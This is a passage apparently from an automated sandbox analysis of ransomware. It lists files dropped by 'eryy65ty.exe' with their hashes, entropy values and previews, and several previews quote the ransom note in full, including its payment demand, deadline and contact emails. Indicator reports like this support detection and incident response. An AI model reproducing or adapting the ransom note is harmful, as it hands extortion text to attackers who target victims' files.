                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:true
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):49418
                                                                                                    Entropy (8bit):1.1654411212483726
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:Ut8meAIiWLG7hF2HHw3Wb/u62ROK3Q3BvKH3Cm:UqmNIA7hF2HHw3/RQBs
                                                                                                    MD5:C35C6B6D79B9FBF4EE60F48C1C925A18
                                                                                                    SHA1:3328F1147154D999A570EA6E3DF6C2315D28166A
                                                                                                    SHA-256:9E0B121A0CA155E4372C989980AC10AAC1D61681C6A086070ED5D1AE1A9125D5
                                                                                                    SHA-512:B2F22075D77CFD8E7322DB81D673D84BAAF4D9ECE931BB8DC056A4011D0E37AEB9C4C940972D7AEE54FD0B28492D75C356BFECE3203E9019015F16F70B1BF0EE
                                                                                                    Malicious:true
                                                                                                    Preview:....>.F......,..9ei....g.&.w....:0W"E#...e...,...~...Wnh../.W.|b..j..>.Th.....I.Q..2..I..W|..`I...H.+..O._..Mk....N..M..o.S.<.3=!5....5.S(..O.R...r.`.P..._.3.,ct...$xc-..P..k?.....PVH..W.f........".1.9..q.i..p.v....1...0.&.:g?i.)u_.z...../.3C'{w.0.@7.9.Dz.z.......9/.../.X...l\..<.}.Y...a...2....%....nQ.;....5,..Y...8.18....zl....LOK.....&I..P6......i...C.0..+..&.<..\....w`am.};....n&..YH2/...0.....+z...t.^.l...R..b.v....I....V+....-........g.zL..D.y Ah....;.O..........Y.|...}..r...'~,0.E.0.G.........7.E....5".......;).}r.e|...(.TM~T..X..R..J4.u..i........-.Ci<......m...l.8q/ cg.G.{_. .6.*....|.K]...N&.p;..|&......."5.K.d8..#^9...Kc..........Y1.....x.3.F...~6CJ.@c.....R...[.6.z......`1.s.+\...}k..t...D2O....K.[*U..:^..7.H...|..=...#...wXO.;.I;.......+.j.k\T......dw^.....I.IV..RE[..a...G.:.........a.........p),......|.....(.{,.g@o.8.....^K...x.B7.6...o|.......Nt{s.E.6..U".,uR*=h..{O\.....Y...dO...*......`..;2..X......O....e...M... .....5%q
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33034
                                                                                                    Entropy (8bit):1.6085478883507103
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:BEiVu2VyPvZfh3MfDuXKeejcFcUYjiGcpUfaogLjSb7JZtTx:BEiRyPvZfJMLiKrjcSUYj/U2ASRZj
                                                                                                    MD5:B362D870169E0BE5336A6F036E90038F
                                                                                                    SHA1:9CF674AA66E44808A6B7E7257F5495FC88E74AE8
                                                                                                    SHA-256:321AD17E2A4E377FEBDFF37906C6E2D09D596C7C65661DAFCCB4E75E1DEB337E
                                                                                                    SHA-512:C47A9ED69B64B25174DDC5578480B42FB23F0468AD378D3A71C7A44FEA1BEB62EEEF2334DE92F7E4DCFB066295F6920253617E60978CFF9C3DA40751462CA64F
                                                                                                    Malicious:true
                                                                                                    Preview:re.yl.....eO..@@..*....I...........v.@..-.....K.*.#....U. ../...w.R.AV<\.....R.....MH...-.....@J"....C4...8).K.'!D..R9V..7.Z..].p...-..wUv.N..a,4....3HH.+.....n`.^(...~.B..]........6..D...Y....m.....N.....__o4...h.......=....f0vc.LR.I.2.A.YE..B...K..!.V.^q.ku..CYv.p...........k....$2o8S...zK.]N.Zs{.5F..,..!H.mv.'..s.'..):..o!n....w>....@.c.~...M.*.cO..$..KE......A.\.b.#/^.K.p....5........G.#.......W..&.....H..>v......Q...ggtw8y...8.S..uy...$H...V....i`.2....H.;...A>...^*g.y.f..........R:..Qj.....~......gr.F!...u#....?.C*._.....5.Or..rXu......+..a_lg.b......p......s.|.....phl(.b.X....h.....(.<S..'..}e....I.J...(V...n@.Q.h.V2.@O.G...40S..o..H.O..S..z..I...............7.I...W.wX.{..../..A... ....1C[..H|..R .5^..J]0.u;..7...e.*.m5<...F...X.\[..$.cO..o+..u.l>...*.V..I....C...<...'.........}.....V..X....@<?.jt.@..^r.P..L..V.9(......tr!...v...y...3a;.q. .:X..y.i...2.z....."...<sYl...>w...4.<.hj....4J.Z...cA.qu..8i........m..m..
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33034
                                                                                                    Entropy (8bit):1.6085478883507103
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:BEiVu2VyPvZfh3MfDuXKeejcFcUYjiGcpUfaogLjSb7JZtTx:BEiRyPvZfJMLiKrjcSUYj/U2ASRZj
                                                                                                    MD5:B362D870169E0BE5336A6F036E90038F
                                                                                                    SHA1:9CF674AA66E44808A6B7E7257F5495FC88E74AE8
                                                                                                    SHA-256:321AD17E2A4E377FEBDFF37906C6E2D09D596C7C65661DAFCCB4E75E1DEB337E
                                                                                                    SHA-512:C47A9ED69B64B25174DDC5578480B42FB23F0468AD378D3A71C7A44FEA1BEB62EEEF2334DE92F7E4DCFB066295F6920253617E60978CFF9C3DA40751462CA64F
                                                                                                    Malicious:false
                                                                                                    Preview:re.yl.....eO..@@..*....I...........v.@..-.....K.*.#....U. ../...w.R.AV<\.....R.....MH...-.....@J"....C4...8).K.'!D..R9V..7.Z..].p...-..wUv.N..a,4....3HH.+.....n`.^(...~.B..]........6..D...Y....m.....N.....__o4...h.......=....f0vc.LR.I.2.A.YE..B...K..!.V.^q.ku..CYv.p...........k....$2o8S...zK.]N.Zs{.5F..,..!H.mv.'..s.'..):..o!n....w>....@.c.~...M.*.cO..$..KE......A.\.b.#/^.K.p....5........G.#.......W..&.....H..>v......Q...ggtw8y...8.S..uy...$H...V....i`.2....H.;...A>...^*g.y.f..........R:..Qj.....~......gr.F!...u#....?.C*._.....5.Or..rXu......+..a_lg.b......p......s.|.....phl(.b.X....h.....(.<S..'..}e....I.J...(V...n@.Q.h.V2.@O.G...40S..o..H.O..S..z..I...............7.I...W.wX.{..../..A... ....1C[..H|..R .5^..J]0.u;..7...e.*.m5<...F...X.\[..$.cO..o+..u.l>...*.V..I....C...<...'.........}.....V..X....@<?.jt.@..^r.P..L..V.9(......tr!...v...y...3a;.q. .:X..y.i...2.z....."...<sYl...>w...4.<.hj....4J.Z...cA.qu..8i........m..m..
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):292
                                                                                                    Entropy (8bit):7.226343117096482
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:2xy/d86/Pkea29KyJiEV7Vs3DPo3TuuOYo+tz8A+5hHGn:H/d86/MeaOhQKqtYo+B+qn
                                                                                                    MD5:465BD75F88255B612D477FD5F79C7D58
                                                                                                    SHA1:2A1671F1B206F47DE43077EBBCDE4969A7F8D6FE
                                                                                                    SHA-256:266216F968617124F4A40D727092D482BE6F83D9B1421C5E1849D191ABA5C4F7
                                                                                                    SHA-512:C76306E6AB93992B7B2DF9FA739B530489B7CFCC5D7BDA79A589D5E35D4989667C10CEFE9F5335832D91ED30B148CEF8238C2943D9D48446B7383BAE40ADC749
                                                                                                    Malicious:true
                                                                                                    Preview:@...k=.$.G..K7U...........SC.....1.y_.......Z=...5fu...;..X.3._i....(...6...j'.V.....ZiM..z....&......J:2-.N.5...xI6.p..CF....&.....:3..)........M,.yr..J]......SN..B... .g....lI...wx0q.W..=...wF..VlK..HudYm.....wJ....D..o./Dt...{.T.T........F..w...SjV..Y..]........k.0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):49418
                                                                                                    Entropy (8bit):1.1654411212483726
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:Ut8meAIiWLG7hF2HHw3Wb/u62ROK3Q3BvKH3Cm:UqmNIA7hF2HHw3/RQBs
                                                                                                    MD5:C35C6B6D79B9FBF4EE60F48C1C925A18
                                                                                                    SHA1:3328F1147154D999A570EA6E3DF6C2315D28166A
                                                                                                    SHA-256:9E0B121A0CA155E4372C989980AC10AAC1D61681C6A086070ED5D1AE1A9125D5
                                                                                                    SHA-512:B2F22075D77CFD8E7322DB81D673D84BAAF4D9ECE931BB8DC056A4011D0E37AEB9C4C940972D7AEE54FD0B28492D75C356BFECE3203E9019015F16F70B1BF0EE
                                                                                                    Malicious:false
                                                                                                    Preview:....>.F......,..9ei....g.&.w....:0W"E#...e...,...~...Wnh../.W.|b..j..>.Th.....I.Q..2..I..W|..`I...H.+..O._..Mk....N..M..o.S.<.3=!5....5.S(..O.R...r.`.P..._.3.,ct...$xc-..P..k?.....PVH..W.f........".1.9..q.i..p.v....1...0.&.:g?i.)u_.z...../.3C'{w.0.@7.9.Dz.z.......9/.../.X...l\..<.}.Y...a...2....%....nQ.;....5,..Y...8.18....zl....LOK.....&I..P6......i...C.0..+..&.<..\....w`am.};....n&..YH2/...0.....+z...t.^.l...R..b.v....I....V+....-........g.zL..D.y Ah....;.O..........Y.|...}..r...'~,0.E.0.G.........7.E....5".......;).}r.e|...(.TM~T..X..R..J4.u..i........-.Ci<......m...l.8q/ cg.G.{_. .6.*....|.K]...N&.p;..|&......."5.K.d8..#^9...Kc..........Y1.....x.3.F...~6CJ.@c.....R...[.6.z......`1.s.+\...}k..t...D2O....K.[*U..:^..7.H...|..=...#...wXO.;.I;.......+.j.k\T......dw^.....I.IV..RE[..a...G.:.........a.........p),......|.....(.{,.g@o.8.....^K...x.B7.6...o|.......Nt{s.E.6..U".,uR*=h..{O\.....Y...dO...*......`..;2..X......O....e...M... .....5%q
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:true
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):49418
                                                                                                    Entropy (8bit):1.15234950588428
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:2iwN08Nga/LfYsgySWaQS0mmu3A7iqngxT+:233Ng9nT1F0mfugxS
                                                                                                    MD5:F8267AA4B6508FE91EE667F68F8303A9
                                                                                                    SHA1:3C616151940A4FA92B3D12133B75E0177246E44D
                                                                                                    SHA-256:508C9BC66AC4E1898F7AC45230E1239FF5D24999201B7BEF7A567353D952B4B7
                                                                                                    SHA-512:EDF6D129C3E3B772C9D719F11548A14D618414F4EBEEA6DA3317AD70CCC580A422601B07F844B345B632AD3620197A8C30797EDF7B084943B9E90464E89D0768
                                                                                                    Malicious:true
                                                                                                    Preview:-.n..!.o3s..L.C..A2F...1...0.:.tro.;.A...O.S.@.i..P.../.V=.//?mt`aHMR.......,veKru......O0...u'.........fyZP.z...x.{.....;Z.k}..)....._..t..]Z.tW....}..L......nu......v[.....xzeF...'.!.5M....w.[`..o.g...M_.......d#X...bkF...}...lO..sW.NQ.p?yG...#7..M.2*...Eg5$H..TZ.....*..fq..OM......3.j9..<9..l.4.2.H..G.E)..f^.ho,r....t........1..Z'.n..Zg*....\<..*..f..c..3...XM.|....E.,..<.j.?....~b..<...<sFK...u_O.I...e..u....).../x.e.....KTrK..M.os.w._.g../.~Jm.t..x.LI.o.=xR..u..?...f.C.....GQ....!D`\.................. C~iA.$..rk..No.....G..xQZ.L6b...-..k..9@|...d...!3.......... 6z7L..".......#...:...i.Y{.@.PH...|@.8...x.... V7C.....H.9........Rn/..$.....<.F..'.q.%...h1u.:m1...A1[.1r .Z...?d..27u.+.\........{..j...W....;'U5....i.|.Q.......I....p....l......[DG.yz......s.7....n..u".f..F93..WP-........,....,j.S..P.J....AV.vy.n.r3...N..:WG..+..e.s...+.;".;.BN........e.s..ZC....2=\.Z..)....@4>_.c..a..C....Q..6........z.....W.^.D..-3!.X\W.L..1..2CO....?..kZK....r
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33034
                                                                                                    Entropy (8bit):1.6067803100560225
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:U1DyXj5qtuhGxeBj5vfa3aq4kdCU1l6FrDvtGLh43zK:U1DyT5qtuhtvUa8dL1MXWF
                                                                                                    MD5:79FB3EB3CE1B7C20483CBA9BB45912A7
                                                                                                    SHA1:83BC056B5026BEC95EF9A90B37717F3A95DA227B
                                                                                                    SHA-256:8EDFC927B47CC4BA9611D1BB4355AEE60DFF0CCDB934DF77E202733E758721E2
                                                                                                    SHA-512:32234640EDD907E78CE1DA67321267595BE4E6221E0EB3DABBEF9F2E569419142BD921C24404B9D65D372A414284E6C1BDD5A6373CFC29B25C5901B38AE5459F
                                                                                                    Malicious:true
                                                                                                    Preview:7$..(.j......".|....._..*.?m9.{od.o.xX.=x.:qyB..#.t[..'........v..\..:W..H.|.\["&rC.q..._..y.{~[7g.........N}...`.B_...%q.%.O&.m.wu....D.4-......bq......:...@q]0LC....]..!g/..3.R.7a[....b.O6.K..B....q.;.o.....#L....s..Ukg.?C.5..qM.Ox.jpma........e.T...../4.o...2.f..D...R....U.6F........vOE..5.d.Q......Q..$.$/...E]&.....m)Q.!s...o...9....w.;P.%*aH~.S..9...:..?.u.... .b{U=:.O..*..rs.(.i...@.;>C....h...M}../.......;g....A@KG..vB.Ai........O..Z.9}.r0..m..)c.FH...B..t.m`=g!.pxwX2.R.DW...Ky..;.Pl...\A1....Q....^..x.7....Q..V@.D...=...6z;.p...j&.BP....9.Um(.}.d.....V..vZ...Z..Db....9..&.h.P...L ...-..P2.k....Rd....m..&.s..J.B.....-p..|4L..&.X%..a)...A.WS..N\....tE..j..*........oE2...+f.i...#..../.}P...."....'...U.e...'...o.j5.s..{...2a.E....9...f.8].._bKHLm..8~...e...h=0....4..M...Fn.S...d....j....!BvX.S.Hx.;Y.N...of...%5z.[.4ss...g.:."..&n.X.....j.C.}7.3.$..m.............r..g.^...u..F.8.........I..b{..um.:.,..@...E.#.=`../.h.~.......+.W
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33034
                                                                                                    Entropy (8bit):1.6067803100560225
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:U1DyXj5qtuhGxeBj5vfa3aq4kdCU1l6FrDvtGLh43zK:U1DyT5qtuhtvUa8dL1MXWF
                                                                                                    MD5:79FB3EB3CE1B7C20483CBA9BB45912A7
                                                                                                    SHA1:83BC056B5026BEC95EF9A90B37717F3A95DA227B
                                                                                                    SHA-256:8EDFC927B47CC4BA9611D1BB4355AEE60DFF0CCDB934DF77E202733E758721E2
                                                                                                    SHA-512:32234640EDD907E78CE1DA67321267595BE4E6221E0EB3DABBEF9F2E569419142BD921C24404B9D65D372A414284E6C1BDD5A6373CFC29B25C5901B38AE5459F
                                                                                                    Malicious:false
                                                                                                    Preview:7$..(.j......".|....._..*.?m9.{od.o.xX.=x.:qyB..#.t[..'........v..\..:W..H.|.\["&rC.q..._..y.{~[7g.........N}...`.B_...%q.%.O&.m.wu....D.4-......bq......:...@q]0LC....]..!g/..3.R.7a[....b.O6.K..B....q.;.o.....#L....s..Ukg.?C.5..qM.Ox.jpma........e.T...../4.o...2.f..D...R....U.6F........vOE..5.d.Q......Q..$.$/...E]&.....m)Q.!s...o...9....w.;P.%*aH~.S..9...:..?.u.... .b{U=:.O..*..rs.(.i...@.;>C....h...M}../.......;g....A@KG..vB.Ai........O..Z.9}.r0..m..)c.FH...B..t.m`=g!.pxwX2.R.DW...Ky..;.Pl...\A1....Q....^..x.7....Q..V@.D...=...6z;.p...j&.BP....9.Um(.}.d.....V..vZ...Z..Db....9..&.h.P...L ...-..P2.k....Rd....m..&.s..J.B.....-p..|4L..&.X%..a)...A.WS..N\....tE..j..*........oE2...+f.i...#..../.}P...."....'...U.e...'...o.j5.s..{...2a.E....9...f.8].._bKHLm..8~...e...h=0....4..M...Fn.S...d....j....!BvX.S.Hx.;Y.N...of...%5z.[.4ss...g.:."..&n.X.....j.C.}7.3.$..m.............r..g.^...u..F.8.........I..b{..um.:.,..@...E.#.=`../.h.~.......+.W
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):292
                                                                                                    Entropy (8bit):7.232508422095727
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ATa/CXd8SYM3KxSfb7pj/mRmkG3FyKqA0R9nbn9oMIo5Q4NZ/evn:Au/CuM3pfbNuRm9OA0Rhn9JLNdevn
                                                                                                    MD5:B651502DDB9DC33A102374F5D8FBE1C4
                                                                                                    SHA1:E53B2C3539D71D30D3BD7BF85FAEB6BE07EE8C2E
                                                                                                    SHA-256:075A775D329B802FBE39565CD06864A310B9EC341BB976DAE515F612F5B4763A
                                                                                                    SHA-512:D5BA9AC97718E4BEAB956AA154DCDE85AEE655B9C8EBD86F239319B4AAD1F803E4BDF415F198DAEF41E906755F10885D526627C58D99CE0BC5B6154355BA92F5
                                                                                                    Malicious:true
                                                                                                    Preview:..i....C....J...........p..........)...c.g.4Q.%1Q....w.7r .iS....._.h.G...h.rH.d:..`..\~...T..}.Y.P.L.6.c..F.oU..8...........h...V.C........oqB..q.c].u.M..4...,~&i......*{.k^9.|..b,.1....t...i.>A.....~..w...R..i.S.....O-p.....Df......Q|.a..G{.H.^.^@M.d.0XS.9..Gp0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):49418
                                                                                                    Entropy (8bit):1.15234950588428
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:2iwN08Nga/LfYsgySWaQS0mmu3A7iqngxT+:233Ng9nT1F0mfugxS
                                                                                                    MD5:F8267AA4B6508FE91EE667F68F8303A9
                                                                                                    SHA1:3C616151940A4FA92B3D12133B75E0177246E44D
                                                                                                    SHA-256:508C9BC66AC4E1898F7AC45230E1239FF5D24999201B7BEF7A567353D952B4B7
                                                                                                    SHA-512:EDF6D129C3E3B772C9D719F11548A14D618414F4EBEEA6DA3317AD70CCC580A422601B07F844B345B632AD3620197A8C30797EDF7B084943B9E90464E89D0768
                                                                                                    Malicious:false
                                                                                                    Preview:-.n..!.o3s..L.C..A2F...1...0.:.tro.;.A...O.S.@.i..P.../.V=.//?mt`aHMR.......,veKru......O0...u'.........fyZP.z...x.{.....;Z.k}..)....._..t..]Z.tW....}..L......nu......v[.....xzeF...'.!.5M....w.[`..o.g...M_.......d#X...bkF...}...lO..sW.NQ.p?yG...#7..M.2*...Eg5$H..TZ.....*..fq..OM......3.j9..<9..l.4.2.H..G.E)..f^.ho,r....t........1..Z'.n..Zg*....\<..*..f..c..3...XM.|....E.,..<.j.?....~b..<...<sFK...u_O.I...e..u....).../x.e.....KTrK..M.os.w._.g../.~Jm.t..x.LI.o.=xR..u..?...f.C.....GQ....!D`\.................. C~iA.$..rk..No.....G..xQZ.L6b...-..k..9@|...d...!3.......... 6z7L..".......#...:...i.Y{.@.PH...|@.8...x.... V7C.....H.9........Rn/..$.....<.F..'.q.%...h1u.:m1...A1[.1r .Z...?d..27u.+.\........{..j...W....;'U5....i.|.Q.......I....p....l......[DG.yz......s.7....n..u".f..F93..WP-........,....,j.S..P.J....AV.vy.n.r3...N..:WG..+..e.s...+.;".;.BN........e.s..ZC....2=\.Z..)....@4>_.c..a..C....Q..6........z.....W.^.D..-3!.X\W.L..1..2CO....?..kZK....r
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:true
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):49418
                                                                                                    Entropy (8bit):1.1809912695354934
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:z+I3GUALXuhAdOOMxtZcHwKrB+JZzl18p1kEIghDch:xiL+hKOOMxMHwVJZz/8p1kpghDch
                                                                                                    MD5:F5EAC1EB7778E62BBE6714027A6163B4
                                                                                                    SHA1:5813D6219B687054F510577E2E3FE7DA1583A861
                                                                                                    SHA-256:B2329D5AE8F43678E6D74B79AA4638D73D1B9007C75CE27D2FE9A26B86308C15
                                                                                                    SHA-512:4F7FBC2DCBDBB45731ECADEE69CCF2F40C3150600435A33B98641FA43C107FDBF3DD15D343CF66B54674C252A0D9A2E48C9464EBD2557A05AADC4E41769F01B3
                                                                                                    Malicious:true
                                                                                                    Preview:?...'.y.P.=.T.:.sD........N1.'.v.!.........Q......@.;.#\e....lc3sy..@...<.W..T'O..'.c.r^...h.....Q..(I.1....,Y...$..q...."=@.Us.Z.......T.=I.e"..|.%.h-.v.......Wr.U >.h:M.c.1....!.[]..w..L.....E.>.O}.....J....8.R......0.k.W.N.j..Qc..n\....2.l.y.t..}.D.B%WL.?.K.'.B>b....yx....Beumx.V......r&.8..A......Jn._......R.FFs..i........(...y.$.p.. 1{....'......K.v......I.2...4{..z....i.RdV.R6.}.....9....l3=O.E/%..o{.R...\....c.Hk.+g.....P...^.60......|.q.v.:.R:....Ops_ku...p....c.'.5.~....{...`..C.s....4:..>.0 ....x.R...\..U.&~.......?.Rp.v.J..B.]..<7..SU..r.H..r...t.h....9.64'BJ..&.A.8..p...AI..$.Tsh.j...u..,2....zf....6..!....pj./..(`=....7..W.y..c?>C...d..3$.=.tndIoV.:d.h...g........U....38.....0/...:*.D..@..{*..b.4~.0j\.3...4........o....P.B..M...x3....k.8Z...E".. uOS..:J6.<&.?.lV...#.._......\..Ro!I=.).......$..$^&.|.;qE.$..E6..h.5.TN..n....pb=...9.p.._O-.,:B:~..X..b..O.@"..!.)...F9...s.....(....N....|-.. ......v.5P.k.....k.....|.!...
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33034
                                                                                                    Entropy (8bit):1.6102654917206927
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:JlGpx33oyfNElJhtAY0PyNSF0wDt+WpR/iOBd3f3oY4G6u+Pcp:JlGpODJhtP06S0wDt+KR/iOBdhvGcp
                                                                                                    MD5:581EA502A1FDA4430994366964645452
                                                                                                    SHA1:7D53EFBE64EA500BF220D1EB35B22C331DEB55E2
                                                                                                    SHA-256:38193A8DE82789BDC5833DB6540D7D10DE7F86A0146F48DD6DDA06BE669FD4DA
                                                                                                    SHA-512:63C0AA30B7475DC89C339A6DC305116F4DACBE897E378399EA1F1AEDC18C7A6B34A62BE8FF6E4F1E6B69940D7C85782D560F640678F88A87B88C4754EC331EC3
                                                                                                    Malicious:true
                                                                                                    Preview:u.`..ZUS...5.N...>.S..W.5...8.....A.^.p.dhv.J....Y.*.a..-rU........l..@.$vS..^...nqYG..jb....n.E.H..[eX.*......q.........H|..:$. .k:...%#....Usw..e.....5.e.f.yP..i...W...hv...X]....n{..._q.l..W........[..$.tH.V.4w...wr.:......D6>WN=.B.....0..N..b)......D.....T..S.x..|....qGGd..../..,Gx...)dYr.F.!...!...8/.L....kOr78.j....Y....2./V.Y.&.}-M*q....Twbz..i-.7O..m.G.>S.I.#...NZ^...)..s.......eHd.f...0.E..+.I.F.o:.7UA....Z..[.?nf;....y...w..5...?0.sb.~|...z.B...z...J..a......h.;.....}.@T...a..~.N....s...~|..CH(..%.a..`.+......ARu3..-.....;..G5|[.`.~..oG4..@R.V...oFSl.7..=.......q.iYE_..g.....8.Jz.tXI2.a....O..sP..!X........Y_..mgY.i....G......R.~l|..i.*.E.s.S.*...J.....A..a.L45a.}S^....K|...?...Ix2=.f.e..k|....\d.R....U..crA!.3....<.z./eP.....K.\..m..s.5.Lw...>~a@...M...8*...C.".LR......L..V..^}$N...e......6.+.3k..o'Z]w.B.5.."T.?)...k.M..n.\#.....E'$...j.}....<.,.......}8pa........K.u.......L.~..}.1.f...RF<.3.Y.Gl.G.Q.u&+.,..r...47....^.6...
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33034
                                                                                                    Entropy (8bit):1.6102654917206927
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:JlGpx33oyfNElJhtAY0PyNSF0wDt+WpR/iOBd3f3oY4G6u+Pcp:JlGpODJhtP06S0wDt+KR/iOBdhvGcp
                                                                                                    MD5:581EA502A1FDA4430994366964645452
                                                                                                    SHA1:7D53EFBE64EA500BF220D1EB35B22C331DEB55E2
                                                                                                    SHA-256:38193A8DE82789BDC5833DB6540D7D10DE7F86A0146F48DD6DDA06BE669FD4DA
